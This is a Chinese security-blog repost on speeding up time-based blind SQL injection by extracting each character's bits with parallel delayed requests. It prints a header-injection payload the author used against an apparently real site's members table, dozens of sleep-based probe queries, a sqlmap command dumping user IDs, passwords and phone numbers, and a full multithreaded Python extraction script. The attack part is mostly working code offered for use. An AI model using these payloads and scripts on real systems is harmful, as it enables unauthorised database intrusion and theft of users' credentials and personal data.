二进制突破延时注入!

admin 2022年4月9日02:21:24安全文章评论23 views6262字阅读20分52秒阅读模式

之前Freebuf出了个视频关于二进制突破延时注入
地址: http://open.freebuf.com/inland/574.html

二进制突破延时注入!


二进制突破延时注入!


我之前遇到个 http头注入的 延时注入,那个跑数据实在是太慢了!这个站已经弄完了

X-forwarded-for: if(now()=sysdate(),sleep(0),0)/' AND (SELECT * FROM (SELECT(SLE
EP(5-(IF(ORD(MID((SELECT IFNULL(CAST(id AS CHAR),0x20) FROM atoz.members ORDER B
Y id LIMIT 0,1),5,1))>64,0,5)))))Eibl) AND 'fqFp'='fqFp'XOR(if(now()=sysdate(),s
leep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"/


遇到延时注入 还是http头 还真不是很好弄 软件除开sqlmap其他的还没看到比较好用快速的!!
这是评论截取下来的


看了这种方法,其实和传统延时注入,最大的区别就是,这种方式获取一个字符,可以利用多线程一次将包发送出去,
在程序中判断每一个包是否有延时,在组成二进制,然后转换成字符,而传统延时注入利用二分法(半折算法)只能使用单线程去获取值,
因为只有判断出了ascii码的值的区间了才能继续往下判断,这样就利用多线程赢得了大量的时间。如果考虑两种方法都是单线程的状态下,其实差距不大。

计算如下:
单线程方式
通常二分法确定一个字符的值平均发包次数在8次左右(常见ascii码范围0-127,64-32-16-8-4-2-1)
在8次请求中,判断需要延时的次数,平均在3到4次左右,延时时间按照2秒计算,忽略每次发包需要的时间。
那么传统算法总时间=4*2s=8秒。
二进制延时算法,出现1的次数一般在2到4次,按照平均值计算,所以总时间=3*2s=6秒。
区别在与,用二进制延时的发,需要延时的次数减少,所以速度较快。
所以在单线程上实际上没有特别明显的优势,优势体现在多线程上。
其实还有一种算法,但是得考累网络环境较好,每次发包响应的时间非常良好,这中方式更有优势
Ascii码的范围在0-127,通常是3位,可以截取每一位来判断,那每一位范围在0到9,使用10个线程同时发包,其中只有一个线程会延时
select * from news where id=1 and if((substr(ascii(‘a’),1,1)=1),sleep(2),0)
那么判断一个字符的值,通过ascii码方式判断,最多只需要30个包就能判断出来,如果10个线程那么不考虑发包时间,延时3次在6秒左右,如果30个线程那么只需要最多两秒。如果ascii码是两位数那么更快。和二进制延时谁更好,有待研究。
注:上述方式都没有考类中文值的情况。

select * from news where id=1 and if((substr(ascii(‘a’),1,1)=0),sleep(2),0) select * from news where id=1 and if((substr(ascii(‘a’),1,1)=1),sleep(2),0) select * from news where id=1 and if((substr(ascii(‘a’),1,1)=2),sleep(2),0) select * from news where id=1 and if((substr(ascii(‘a’),1,1)=3),sleep(2),0) select * from news where id=1 and if((substr(ascii(‘a’),1,1)=4),sleep(2),0) select * from news where id=1 and if((substr(ascii(‘a’),1,1)=5),sleep(2),0) select * from news where id=1 and if((substr(ascii(‘a’),1,1)=6),sleep(2),0) select * from news where id=1 and if((substr(ascii(‘a’),1,1)=7),sleep(2),0) select * from news where id=1 and if((substr(ascii(‘a’),1,1)=8),sleep(2),0) select * from news where id=1 and if((substr(ascii(‘a’),1,1)=9),sleep(2),0) select * from news where id=1 and if((substr(ascii(‘a’),2,1)=0),sleep(2),0) select * from news where id=1 and if((substr(ascii(‘a’),2,1)=1),sleep(2),0) select * from news where id=1 and if((substr(ascii(‘a’),2,1)=2),sleep(2),0) select * from news where id=1 and if((substr(ascii(‘a’),2,1)=3),sleep(2),0) select * from news where id=1 and if((substr(ascii(‘a’),2,1)=4),sleep(2),0) select * from news where id=1 and if((substr(ascii(‘a’),2,1)=5),sleep(2),0) select * from news where id=1 and if((substr(ascii(‘a’),2,1)=6),sleep(2),0) select * from news where id=1 and if((substr(ascii(‘a’),2,1)=7),sleep(2),0) select * from news where id=1 and if((substr(ascii(‘a’),2,1)=8),sleep(2),0) select * from news where id=1 and if((substr(ascii(‘a’),2,1)=9),sleep(2),0) select * from news where id=1 and if((substr(ascii(‘a’),3,1)=0),sleep(2),0) select * from news where id=1 and if((substr(ascii(‘a’),3,1)=1),sleep(2),0) select * from news where id=1 and if((substr(ascii(‘a’),3,1)=2),sleep(2),0) select * from news where id=1 and if((substr(ascii(‘a’),3,1)=3),sleep(2),0) select * from news where id=1 and if((substr(ascii(‘a’),3,1)=4),sleep(2),0) select * from news where id=1 and if((substr(ascii(‘a’),3,1)=5),sleep(2),0) select * from news where id=1 and if((substr(ascii(‘a’),3,1)=6),sleep(2),0) select * from news where id=1 and if((substr(ascii(‘a’),3,1)=7),sleep(2),0) select * from news where id=1 and if((substr(ascii(‘a’),3,1)=8),sleep(2),0) select * from news where id=1 and if((substr(ascii(‘a’),3,1)=9),sleep(2),0)

如果出现是http头注入 还需要cookies 这种!我自己当时采取的只能sqlmap的 就是多租几个vps分段跑!!

sqlmap.py -r 1.txt --dbms mysql --batch --dump -C id,pw,phone -T members --thread=5 --start=250 --stop=400 --delay=0.3

下面是别人写 的二进制突破延时注入demo

!!

---------------------------------------------------------------不带cookies和post请求直接脚本----

#!/usr/bin/env python

# -*- coding: utf-8 -*-

# @Author: Lcy

# @Date: 2015-08-29 22:26:17

# @Last Modified by: Sunshie

# @Last Modified time: 2015-08-30 01:48:41

# blog:

# 延迟注入工具

import urllib2

import time

import socket

import threading

import requests

class my_threading(threading.Thread):

def __init__(self, str,x):

threading.Thread.__init__(self)

self.str = str

self.x = x

def run(self):

global res

x=self.x

j = self.str

url = "http://localhost/demo/1.php?username=root'+and+if(1=(mid(lpad(bin(ord(mid((select user())," + str(x) + ",1))),8,0),"+ str(j) + ",1)),sleep(2),0)#"

html = request(url)

verify = 'timeout'

if verify not in html:

res[str(j)] = 0

#print 1

else:

res[str(j)] = 1

def request(URL):

user_agent = { 'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10' }

req = urllib2.Request(URL, None, user_agent)

try:

request = urllib2.urlopen(req,timeout=2)

except Exception ,e:

time.sleep(2)

return 'timeout'

return request.read()

def curl(url):

try:

start = time.clock()

requests.get(url)

end = time.clock()

return int(end)

except requests.RequestException as e:

print u"访问出错!"

exit()

def getLength():

i = 0

while True:

print "[+] Checking: %s r" %i

url = "http://localhost/demo/1.php?username=root'+and+sleep(if(length((select user()))="+ str(i) +",1,0))#"

html = request(url)

verify = 'timeout'

if verify in html:

print u"[+] 数据长度为: %s" %i

return i

i = i + 1

def bin2dec(string_num):

return int(string_num, 2)

def getData(dataLength):

global res

data = ""

for x in range(dataLength):

x = x + 1

#print x

threads = []

for j in range(8):

result = ""

j = j + 1

sb = my_threading(j,x)

sb.setDaemon(True)

threads.append(sb)

#print j

for t in threads:

t.start()

for t in threads:

t.join()

#print res

tmp = ""

for i in range(8):

tmp = tmp + str(res[str(i+1)])

#print chr(bin2dec(tmp))

res = {}

result = chr(bin2dec(tmp))

print result

data = data + result

sb = None

print "[+] ok!"

print "[+] result:" + data

if __name__ == '__main__':

stop = False

res = {}

length = getLength()

getData(length)

-------------------------------------------------


python使用urllib2实现发送带cookie的请求。。具体实现方法如下:

import urllib2 opener = urllib2.build_opener() opener.addheaders.append(('Cookie','cookiename=cookievalue')) f = opener.open(

)

#!/usr/bin/python

#coding=utf-8

import urllib

import urllib2

def post(url, data):

req = urllib2.Request(url)

data = urllib.urlencode(data)

#enable cookie

opener = urllib2.build_opener(urllib2.HTTPCookieProcessor())

response = opener.open(req, data)

return response.read()

def main():

posturl = "http://www.xiami.com/member/login"

data = {'email':'myemail', 'password':'mypass', 'autologin':'1', 'submit':'登 录', 'type':''}

print post(posturl, data)

if __name__ == '__main__':

main()


from

https://forum.90sec.org/forum.php?mod=viewthread&tid=8923


原文始发于微信公众号(moonsec):二进制突破延时注入!

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年4月9日02:21:24
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  二进制突破延时注入! http://cn-sec.com/archives/565596.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: